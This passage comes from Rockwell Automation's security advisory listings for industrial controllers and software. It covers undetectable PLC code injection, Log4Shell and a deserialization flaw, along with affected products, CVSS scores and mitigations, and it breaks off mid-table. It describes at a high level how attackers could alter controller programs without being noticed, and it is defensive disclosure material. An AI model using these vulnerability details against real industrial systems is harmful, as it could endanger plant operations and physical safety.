Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the PSIRT Inbox (PSIRT@rockwellautomation.com).

Additional Links

Critical

PN1585 | PN1585 | Logix Controllers May Allow for Unauthorized Code Injection

Published Date:

May 06, 2022

Last Updated:

May 06, 2022

CVE IDs:

CVE-2021-22681, CVE-2022-1161

Products:

5069 Compact GuardLogix 5380, 1769 CompactLogix Controllers, 1769 CompactLogix 5370, 1756/5069 GuardLogix, 1768 CompactLogix Controllers, ControlLogix Hardware

CVSS Scores:

10.0

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Version 1.2 – May 06, 2022 Updated vulnerability details and risk mitigations

Detailed Information

Claroty, a cybersecurity technology vendor and partner of Rockwell Automation, disclosed a vulnerability in Logix Controllers to Rockwell Automation. Claroty found that some Logix Controllers may allow an attacker, with the ability to modify user programs, to download a user program containing malicious code that would be undetectable to the user. This vulnerability was found by Sharon Brizinov and Tal Keren of Claroty, and they have provided a blog post with more details located here.

An attacker could gain the ability to modify user programs by leveraging a previously disclosed vulnerability (“Authentication Bypass Vulnerability Found in Logix Controllers”) whereby a private key was discovered potentially allowing Logix Controllers communicating over the unauthenticated version of EtherNet/IP™ to accept communication that do not originate from Studio 5000 Logix Designer ® software.

Affected Products

1768 CompactLogix™ controllers
1769 CompactLogix controllers
CompactLogix 5370 controllers
CompactLogix 5380 controllers
CompactLogix 5480 controllers
Compact GuardLogix® 5370 controllers
Compact GuardLogix 5380 controllers

ControlLogix® 5550 controllers
ControlLogix 5560 controllers
ControlLogix 5570 controllers
ControlLogix 5580 controllers
GuardLogix 5560 controllers
GuardLogix 5570 controllers
GuardLogix 5580 controllers

FlexLogix™ 1794-L34 controllers
DriveLogix™5730 controllers
SoftLogix™ 5800 controllers

Vulnerability Details

[CVE-2022-1161]: Modification of PLC Program Code

An attacker with the ability to modify a user program may change user program code on some ControlLogix, CompactLogix, and GuardLogix Control systems. Studio 5000 Logix Designer writes user-readable program code to a separate location than the executed compiled code allowing an attacker to change one and not the other. Additionally, devices communicating over the unauthenticated version of EtherNet/IP may be vulnerable to attacks from custom clients exploiting CVE-2021-22681

CVSS v3.1 Base Score: 10.0/CRITICAL
CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

The following types of code are affected by this vulnerability – indicated by an X:

Product	Structured Text (ST)	Ladder Diagrams (LD)	Function Block Diagram (FBD)	Sequential Function Chart (SFC)	Add-On Instructions (AOI)
1768 CompactLogix	X	Not affected	X	X	X
1769 CompactLogix	X	Not affected	X	X	X
CompactLogix 5370	X	Not affected	X	X	X
CompactLogix 5380	X	X	X	X	X
CompactLogix 5480	X	X	X	X	X
Compact GuardLogix 5370	X	Not affected	X	X	X
Compact GuardLogix 5380	X	X	X	X	X
ControlLogix 5550	X	Not affected	X	X	X
ControlLogix 5560	X	Not affected	X	X	X
ControlLogix 5570	X	Not affected	X	X	X
ControlLogix 5580	X	X	X	X	X
GuardLogix 5560	X	Not affected	X	X	X
GuardLogix 5570	X	Not affected	X	X	X
GuardLogix 5580	X	X	X	X	X
FlexLogix 1794-L34	X	Not affected	X	X	X
DriveLogix 5730	X	Not affected	X	X	X
SoftLogix 5800	X	Not affected	X	X	X

Risk Mitigation & User Action

We recommend customers using the affected products, below, to apply both Risk Mitigations A and B, if possible. Additionally, customers are advised to implement Risk Mitigation B as a long-term mitigation action and to overall increase the security posture of their environment. Furthermore, we encourage customers to apply general security guidelines in addition to the risk mitigations for a comprehensive defense in depth strategy.

Product Family

Risk Mitigation and Recommended User Actions

ControlLogix 5570
ControlLogix 5580
GuardLogix 5570
GuardLogix 5580
CompactLogix 5380
Compact GuardLogix 5380

Risk Mitigation A:

Recompile and download user program code (i.e., acd) using an uncompromised workstation
Put controller mode switch into Run position

If keeping controller mode switch in Run is impractical, use the following mitigation:

Recompile and download user program code (i.e., acd) using an uncompromised workstation
Monitor controller change log for any unexpected modifications or anomalous activity
Utilize the Controller Log feature
Utilize Change Detection in the Logix Designer Application
If available, use the functionality in FactoryTalk AssetCentre software to detect changes

Risk Mitigation B:
Implement CIP Security™ to help prevent unauthorized connections when properly deployed. Supported controllers and communications modules include:

ControlLogix 5580 processors using on-board EtherNet/IP port
GuardLogix 5580 processors using on-board EtherNet/IP port
ControlLogix 5580 processors operating in High Availability (HA) configurations using 1756-EN4TR’s
ControlLogix 5560, ControlLogix 5570, ControlLogix 5580, GuardLogix 5570 and GuardLogix 5580 can use a 1756-EN4TR ControlLogix EtherNet/IP™ module
If using a 1756-EN2T, then replace with a 1756-EN4TR
CompactLogix 5380 using on-board EtherNet/IP port
Compact GuardLogix 5380 using on-board EtherNet/IP port

We recommend customers using the affected products, below, to apply Risk Mitigation A. We encourage customers to apply general security guidelines in addition to the risk mitigations for a comprehensive defense in depth strategy.

Product Family

Risk Mitigation and Recommended User Actions

1768 CompactLogix
1769 CompactLogix
CompactLogix 5370
CompactLogix 5480
ControlLogix 5560
GuardLogix5560

Risk Mitigation A:

Recompile and download user program code (i.e., acd)
Put controller mode switch into Run position

If keeping controller mode switch in Run is impractical, then use the following mitigation:

Recompile and download user program code (i.e., acd)
Monitor controller change log for any unexpected modifications or anomalous activity
Use the Controller Log feature
Use Change Detection in the Logix Designer application
If available, use the functionality in FactoryTalk AssetCenter to detect changes

In addition to applying risk mitigations, customers should also utilize the detection tools, listed below, to identify if this vulnerability has been exploited in their environment.

Exploitation Detection Method:

The detection method can be used to determine if the user program residing in the controller is identical to what was downloaded. After upgrading to V34, this user program verification can be done via two methods:

On-demand using the online feature of the Logix Designer Compare Tool V9 or later. Details on how to utilize user program verification to discover if this vulnerability has been exploited can be found at Logix Designer Compare Tool User Manual, pages 19-20.
Schedule user program verification on FactoryTalk® AssetCentre V12 or later (Available Fall 2022).

Notes:

The user program comparison must be performed using the online compare tool feature from an uncompromised workstation.
Customers are directed to upgrade to Studio 5000® V34 software, or later, and the corresponding firmware versions for the Logix 5580, 5380, 5480, GuardLogix 5580 and Compact GuardLogix 5380. Review your controllers’ user manual to determine the required controller firmware version.

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products

Consult the product documentation for specific features, such as a hardware keyswitch setting, to which may be used to block unauthorized changes, etc.
Block all traffic to EtherNet/IP or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see BF7490 - TCP/UDP Ports Used by Rockwell Automation Products.

Software/PC-based Mitigation Strategies

Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
Use of Microsoft® AppLocker or other similar allow list application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at QA17329 - Using Rockwell Automation Software Products with AppLocker.
Confirm that the least-privilege user principle is followed and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.

Social Engineering Mitigation Strategies
Do not click on or open URL links from untrusted sources.Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.

General Mitigations (Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.

Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet
Locate control system networks and devices behind firewalls and isolate them from the business network.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please see Rockwell Automation Publication System Security Design Guidelines Reference Manual.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation at PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the PSIRT Inbox (PSIRT@rockwellautomation.com).
Please direct all media inquiries to Marci Pelzer (MPelzer@rockwellautomation.com).

Additional Links

High

PN1586 | PN1586 | Logix Designer Application May Allow Unauthorized Controller Code Injection

Published Date:

May 06, 2022

Last Updated:

May 06, 2022

CVE IDs:

CVE-2022-1159

Products:

RSLogix 5000 / Studio 5000 Logix Designer

CVSS Scores:

7.7

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Version 1.0 – March 31, 2022
Version 1.1 – May 06, 2022 – Updated vulnerability details and mitigations

Detailed Information

Claroty, a cybersecurity technology vendor and partner of Rockwell Automation, disclosed a vulnerability in Studio 5000 Logix Designer® software which impacts some Logix controllers. Claroty found that the Logix Designer application could allow an unauthorized third-party to inject controller code using a compromised workstation where the third party has gained administrative access. This could allow a third party to download the modified program to the controller and potentially allow for arbitrary code execution on the controller in a way that would potentially be undetectable to a user. This vulnerability was found by Sharon Brizinov and Tal Keren of Claroty, and they have provided a blog post with more details located here .

Affected Products

Studio 5000 Logix Designer application v28 and later, and the following Logix controllers running these versions:

ControlLogix® 5580 controllers
GuardLogix® 5580 controllers
CompactLogix™ 5380 controllers
CompactLogix 5480 controllers
Compact GuardLogix 5380 controllers

Vulnerability Details

[CVE-2022-1159]: Modification of PLC Program Code
Studio 5000 Logix Designer compiles the user program on the workstation. This compilation process prepares the Logix Designer application user program for download to a Logix controller. To successfully exploit this vulnerability, an attacker must first gain administrator access to the workstation running Studio 5000 Logix Designer. The attacker can then intercept the compilation process and inject code into the user program. The user may potentially be unaware that this modification has taken place.

This exploit could also allow modification of source key protected content and license source protected content. Changes to the content may not be noticeable to the user. Additionally, exploitation could affect safety tasks if unlocked and signature unprotected at the time of the attack. A locked and signature protected safety task would not be impacted.

CVSS v3.1 Base Score: 7.7/HIGH
CVSS Vector: AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H

Risk Mitigation & User Action

There is no long-term mitigation for this vulnerability. Customers using the affected hardware and software are directed to apply compensating controls and utilize detection capabilities, which are both listed below. Additionally, we recommend implementing general security guidelines for a comprehensive defense in depth strategy.

Compensating Controls:

Apply the Windows Hardening Guidance found in QA63609 - Recommended guidelines for hardening software, computer, device, and network systems and infrastructure (CIS Benchmarks) to help minimize risk of the vulnerability.
Secure their workstations by referencing Rockwell Automation Configure System Security Features publication SECURE-UM001A. This publication also describes how to detect attempts to exploit this vulnerability on a compromised workstation using Windows® security audit features – see page 51.

Exploitation Detection Method:

The detection method can be used to determine if the user program residing in the controller is identical to what was downloaded. After upgrading to V34, this user program verification can be done via two methods:

On-demand using the online feature of the Logix Designer Compare Tool V9 or later. Details on how to utilize user program verification to discover if this vulnerability has been exploited can be found at Logix Designer application Compare Tool User Manual publication LDCT-UM001C, pages 19-20.
Schedule user program verification on FactoryTalk® AssetCentre V12 or later (Available Fall 2022).

Notes:

The user program comparison must be performed using the online compare tool feature from an uncompromised workstation.
Customers are directed to upgrade to Studio 5000® V34 software, or later, and the corresponding firmware versions for the Logix 5580, 5380, 5480, GuardLogix 5580 and Compact GuardLogix 5380. Review your controllers’ user manual to determine the required controller firmware version.

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products

Consult the product documentation for specific features, such as a hardware keyswitch setting, to which may be used to block unauthorized changes, etc.
Block all traffic to EtherNet/IP™ or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see BF7490 - TCP/UDP Ports Used by Rockwell Automation Products.

Software/PC-based Mitigation Strategies

Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
Use of Microsoft AppLocker or other similar allow list application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at QA17329 - Using Rockwell Automation Software Products with AppLocker.
Confirm that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.

Social Engineering Mitigation Strategies

Do not click on or open URL links from untrusted sources.
Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.

General Mitigations Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.

Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet.
Locate control system networks and devices behind firewalls and isolate them from the business network.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please see the Rockwell Automation publication number SECURE-RM001 “System Security Design Guidelines Reference Manual”.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the PSIRT Inbox (PSIRT@rockwellautomation.com).
Please direct all media inquiries to Marci Pelzer (MPelzer@rockwellautomation.com).

Additional Links

PN1594 | PN1594 | APT Cyber Tools Targeting ICS/SCADA Devices (PIPEDREAM/INCONTROLLER)

Published Date:

May 06, 2022

Last Updated:

May 06, 2022

Products:

FactoryTalk Linx Gateway

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Version 1.0 – May 6, 2022

Executive Summary

On April 13, 2022, researchers announced a new set of tools that was developed by an Advanced Persistent Threat (APT). This set of tools allows threat actors to attack specific ICS and OT hardware and software. Rockwell Automation is providing this advisory to notify customers of our response to this threat.

We are diligently working through our process to evaluate the threat and provide security mitigations as needed. Rockwell Automation recommends that customers apply hardening techniques, in addition to security best practices for a comprehensive defense in depth approach.

Affected Products

We are aware that the tool set contains modules that target OPC UA servers, CODESYS runtimes, and ASRock drivers. After evaluation, Rockwell Automation is aware that the products, listed below, use one of the targeted components. This list may be updated if more products are identified.

Products that use OPC UA servers:

FactoryTalk® Linx Gateway
- Editions include embedded, basic, standard, extended distributed, professional
- Versions include 6.10, 6.11, 6.20, 6.21 and 6.30

Risk Mitigation & User Action

We recommend the following compensating controls for customers using Rockwell Automation products that use the targeted hardware and software:

Disable anonymous authentication and configure the use of FactoryTalk Security using the following guidance. FactoryTalk Linx Gateway Getting Result Guide FTLG-GR001E
- Chapter 4 - UA Server Endpoints - Endpoint Properties
- Appendix D - Secure FactoryTalk Linx Gateway using FactoryTalk Security
Enforce a lockout threshold for failed authentication attempts and configure audit logs using the following guidance to detect signs of an attack. FactoryTalk Security System Configuration Guide Publication FTSEC-QS001R - Chapter 9
- Set system policies - Account Policy Settings
- Set audit policies - Monitor security-related events

General Security Guidelines

Refer to the Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Industrial Security Services website for information on security services from Rockwell Automation to assess, help protect, detect, respond, and recover from incidents. These services include assessments, designs, implementations, industrial anomaly detection, patch management, and remote infrastructure monitoring and administration.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation in PN1354 – Industrial Security Advisory Index

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

If you have questions regarding this notice, please send an email to our product security inbox at: PSIRT@rockwellautomation.com

Additional Links

PN1592 | PN1592 | Vulnerable Third-Party Components in FactoryTalk® ProductionCentre

Published Date:

May 04, 2022

Last Updated:

May 04, 2022

Products:

FactoryTalk ProductionCentre

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Version 1.0 – May 4, 2022

Executive Summary

Rockwell Automation discovered multiple vulnerabilities affecting third-party software utilized by our FactoryTalk® ProductionCentre (FTPC) products. If exploited, these vulnerabilities could have various effects, including but not limited to, remote code execution, information disclosure, and denial of service on FTPC products.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerabilities, including products in scope and recommended countermeasures, are provided herein.

Affected Products

FactoryTalk® ProductionCentre v10.04 and earlier

Vulnerability Details

As part of our commitment to security, Rockwell performs routine testing and vulnerability scanning to maintain the security posture of products. Due to open-source testing, we were made aware that third-party components utilized within our FTPC products contain vulnerabilities that range from low to high. The third-party components are listed below.

Apache ActiveMQ Version 5.15.0	Dom4J Version 1.61
Apache Common BeanUtils Version 1.9.0	Hibernate ORM Version 3.3.2
Apache CXF Version 3.1.10	Jackson Databind Version 2.1.4
Apache Http Client Version 4.5.2	JasperReports Library Version 6.2.0
Apache Santuario (Java) 2.0.8	Java Platform Standard Edition Version 8u181
Apache Xalan Version (Java) 2.7.1	JBoss Remoting Version 4.0.22.Final
Apache Xerces2J Version 2.11.0.SP5	JGroups Version 2.12.2 Final
Bouncy Castle Version 1.36, 1.44, 1.55	Spring Framework Versions 2.5.5, 4.3.8-4.3.9
Cryptacular Version 1.51	Undertow Core Versions 1.0.10.Final
Codehaus XFire Version 0.9.5.2	Velocity.apache.org Version 1.7

Risk Mitigation & User Action

Customers using the affected software are encouraged to implement the risk mitigations below to minimize the risk of vulnerabilities. We encourage customers to combine the risk mitigations with security best practices to deploy a defense-in-depth strategy.

Apply security recommendations found in the FactoryTalk® ProductionCentre Knowledgebase Article IN39626 - Security Recommendations for FactoryTalk ProductionCentre to help minimize the risk of these third-party vulnerabilities.
Deploy network segmentation, when possible, per our standard deployment recommendations.

General Security Guidelines

Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, see Knowledgebase Article PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet
Locate control system networks and devices behind firewalls and isolate them from the business network.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also, recognize that a VPN is only as secure as the connected devices.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable the assessment, design, implementation, and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Additional Links

If you have questions regarding this notice, please send an email to our product security inbox at: PSIRT@rockwellautomation.com

High

PN1589 | PN1589 | Multiple Products Vulnerable to Deserialization of Data

Published Date:

April 04, 2022

Last Updated:

April 04, 2022

CVE IDs:

CVE-2022-1118

Products:

Using CCW with Micro800 Controllers, ISaGRAF, Using CCW with Component Class Drives, Using CCW with PanelView Component Terminals

CVSS Scores:

8.6

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Version 1.0 – April 4, 2022

Executive Summary

Rockwell Automation received a report from the researcher Kimiya through Trend Micro’s Zero Day Initiative about vulnerabilities in Connected Components Workbench™, ISaGRAF® Workbench and Safety Instrumented Systems Workbench for Trusted® controllers. If successfully exploited, these vulnerabilities may result in remote code execution. These vulnerabilities all require user interaction through a phishing attack, for example, to be successfully exploited.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

Connected Components Workbench v13.00.00 and below.
ISaGRAF Workbench v6.0-v6.6.9
Safety Instrumented System Workstation v1.2 and below (for Trusted Controllers)

Vulnerability Details

CVE-2022-1118- Deserialization of untrusted data may result in arbitrary code execution
Connected Components Workbench does not limit the objects that can be deserialized. This vulnerability allows attackers to craft a malicious serialized object that, if opened by a local user in Connected Components Workbench, may result in arbitrary code execution. This vulnerability requires user interaction to be successfully exploited.

CVSS v3.1 Base Score: 8.6/10[HIGH]
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Risk Mitigation & User Action

Customers using the affected software are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.

Products Affected	Suggested Actions
Connected Components Workbench Versions 13.00 and below	Customers should update to version 20.00, which mitigates this vulnerability.
ISaGRAF Workbench Versions 6.0-6.6.9	It is recommended that customers follow the security guidelines below until an updated release is available to mitigate this issue.
SIS Workstation Versions 1.2 and below (for Trusted Controllers)	It is recommended that customers follow the security guidelines below until an updated release is available to mitigate this issue.

If an upgrade is not possible or available, customers should consider deploying the following mitigations:

Run Connected Components Workbench as a User, not as an Administrator, to minimize the impact of malicious code on the infected system.
Do not open untrusted .ccwsln files with Connected Component Workbench, ISaGRAF, or SISW. Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.
Use of Microsoft® AppLocker or other similar allow list applications can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at QA17329 - Using Rockwell Automation Software Products with AppLocker
Confirm that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.

General Security Guidelines

Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, see PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet
Locate control system networks and devices behind firewalls and isolate them from the business network.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that a VPN is only as secure as the connected devices.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the PSIRT Inbox (PSIRT@rockwellautomation.com)

Additional Links

Critical

PN1579 | Log4Shell Vulnerability Notice

Published Date:

January 21, 2022

Last Updated:

December 01, 2024

CVE IDs:

CVE-2021-4104, CVE-2021-45046, CVE-2019-17571, CVE-2021-44228

Products:

Production Management

CVSS Scores (v3.1):

10, 3.7, 8.1, 9.8

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

Yes

More Details Less Details

Revision History

Revision Number

2.2

Revision History

Version 1.0 – 12-Dec-2021. Initial Version

Version 1.1 – 15-Dec-2021. Updated Affected Products and Risk Mitigation & User Actions

Version 1.2 – 17-Dec-2021. Updated FTA DataView Versions affected

Version 2.0 – 19-Dec-2021. Updated Affected Products and Risk Mitigation & User Actions, etc.

Version 2.1 – January 7, 2022. Updated FactoryTalk® Analytics™ DataView, Data Flow ML, Warehouse Management Patch Guidance and User Actions, etc.
Version 2.2 – January 21, 2022 Updated DataView Mitigation Actions, etc

Executive Summary

On December 9, 2021, a vulnerability was announced named “Log4Shell” by researchers. This vulnerability allows for remote code execution by exploiting the Java Logging Library log4j2.

Rockwell Automation is aware of this vulnerability and of how it could, if exploited, potentially impact our customers’ environments. Rockwell Automation has completed process of evaluation on how the mitigation techniques will impact the functionality and performance of the Rockwell Automation hardware, software, and pre-engineered products and solutions that incorporate this software.

Affected Products

Rockwell Automation has investigated its product portfolio to identify which of its products may be directly affected by the "Log4Shell" vulnerability. Rockwell Automation will continue to monitor this situation and will update this advisory if necessary. Our investigation has indicated that the following Rockwell Automation products are affected.

Product Affected	Versions Affected
Plex (A Rockwell Automation Company) Industrial Internet of Things	All Versions < 2.17
Fiix (A Rockwell Automation Company) CMMS™ core V5	This product is cloud-based and has been updated for all customers.
Warehouse Management	4.01.00, 4.02.00, 4.02.01, 4.02.02
EIG (Discontinued)	3.03.00
Industrial Data Center	9300-NS-ESSENTIAL, 9300-NS-ESSENTIALPLUS – Gen 1, Gen 2, Gen 3, Gen 3.5
VersaVirtual™ Application	9300-VV2000RN, 9300-VV2000EN, 9300-VV1000RN, 9300-VV1000EN – Series A
FactoryTalk® Analytics™ DataFlowML	All Versions until 4.00.00 (including)
FactoryTalk Analytics DataView	All
Firewall Managed Support – Cisco FirePOWER® Thread Defense	9300-FMAN, 9300-FSYS Version 6.2.3 – 7.1.0

Vulnerability Details

CVE-2021-44228: Apache Log4j2 JNDI features do not help protect against attacker-controlled LDAP and other JNDI related endpoints

Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.

CVSS v3.1 Base Score: 10/10 [Critical]
CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack.

It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DOS) attack. Log4j 2.15.0 restricts JNDI LDAP lookups to localhost by default. Note that previous mitigations involving configuration such as to set the system property log4j2.noFormatMsgLookup to true do NOT mitigate this specific vulnerability.

CVSS v3.1 Base Score: 3.7/10 [Moderate]
CVSS V3.1 Vector: AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L

CVE-2021-4104: JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data

JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.

CVSS v3.1 Base Score: 8.1/10 [High]
CVSS V3.1 Vector: AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2019-17571: Included in Log4j 1.2 is a SocketServer class that is vulnerable to deserialization of untrusted data

Included in Log4j 1.2 is a SocketServer class that is vulnerable to deserialization of untrusted data which can be exploited to remotely execute arbitrary code when combined with a deserialization gadget when listening to untrusted network traffic for log data. This affects Log4j versions up to 1.2 up to 1.2.17.

CVSS v3.1 Base Score: 9.8/10 Critical]
CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Risk Mitigation & User Action

Vulnerability	Products Affected	Suggested Actions
CVE-2021-44228	Plex Industrial IoT	This product has been updated to version 2.17.1 and all vulnerabilities are mitigated at this time. No user action is required.
	Fiix CMMS core V5	The product has been updated to remove Log4j completely and is no longer vulnerable. No user interaction is required.
	Warehouse Management Version 4.01.00, 4.02.00, 4.02.01, 4.02.02	Customers should upgrade to version 4.02.03, which has been released to mitigate this vulnerability.
	MES EIG 3.03.00	This product is currently discontinued and therefore no patch will be provided. Customers should upgrade to EIG Hub if possible or work with their local representatives about alternative solutions.
	Industrial Data Center (9300-NS-ESSENTIAL, 9300-NS-ESSENTIALPLUS) – Gen 1, Gen 2, Gen 3, Gen 3.5	- For non-managed support customers, follow the mitigation instructions outlined by VMware in VMSA-2021-0028. - For managed support customers, Rockwell Automation support team will be reaching out to affected customers to implement mitigation steps. For specific site details, please contact the support team or your Customer Success Manager. - For non-managed support customers with a with VNxE, follow the mitigation outlined by Dell in DSA-2021-298. - For non-managed support customers with a Data Domain, follow the mitigation outlined by Dell in DSA-2021-274
	VersaVirtual (9300-VV2000RN, 9300-VV2000EN, 9300-VV1000RN, 9300-VV1000EN) – Series A	- For non-managed support customers, follow the mitigation instructions outlined by VMware in VMSA-2021-0028.2. - For managed support customers, Rockwell Automation support team will be reaching out to affected customers to implement mitigation steps. For specific site details, please contact the support team or your Customer Success Manager.
	FactoryTalk Analytics DataFlowML	Customers should upgrade to version 4.00.01, which has been released to mitigate this vulnerability. It is recommended that customers not use DataFlow ML prior to version 4.00.01.
